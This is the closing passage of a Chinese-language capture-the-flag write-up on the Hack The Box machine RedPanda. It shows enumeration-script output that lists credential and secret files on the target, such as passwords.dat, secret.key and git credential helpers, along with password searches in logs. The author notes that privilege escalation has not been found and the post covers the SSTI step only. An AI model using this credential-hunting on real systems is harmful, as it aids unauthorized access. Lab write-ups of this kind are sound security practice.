/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c /usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c /usr/share/doc/git/contrib/credential/netrc/git-credential-netrc /usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh /usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c /usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c /usr/share/man/man1/git-credential-cache--daemon.1.gz /usr/share/man/man1/git-credential-cache.1.gz /usr/share/man/man1/git-credential-store.1.gz /usr/share/man/man1/git-credential.1.gz#)There are more creds/passwds files in the previous parent folder/usr/share/man/man7/gitcredentials.7.gz /usr/share/man/man8/systemd-ask-password-console.path.8.gz /usr/share/man/man8/systemd-ask-password-console.service.8.gz /usr/share/man/man8/systemd-ask-password-wall.path.8.gz /usr/share/man/man8/systemd-ask-password-wall.service.8.gz#)There are more creds/passwds files in the previous parent folder/usr/share/pam/common-password.md5sums /var/cache/debconf/passwords.dat /var/lib/cloud/instances/f97e41c8-944d-4b3f-a3a8-8db23afb94f3/sem/config_set_passwords /var/lib/fwupd/pki/secret.key /var/lib/pam/password╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs╔══════════╣ Searching passwords inside logs (limit 70) Binary file /var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/user-1000.journal matches [ 3.636139] systemd[1]: Started Forward Password Requests to Wall Directory Watch. [ 3.808595] systemd[1]: Started Forward Password Requests to Wall Directory Watch.-
目前還沒找到正確的提權方法,這次就當作一次SSTI注入來發吧,等找到方法了再更新文章
-
有興趣的UU可以上 Hack The Box: Hacking Training For The Best | Individuals & Companies 嘗試提權到root,本次的機器名為:RedPanda
總結
以上是生活随笔為你收集整理的HackTheBox -- RedPanda的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python一般学多久可以考试_为何Py
- 下一篇: Qt模态界面设置setWindowMod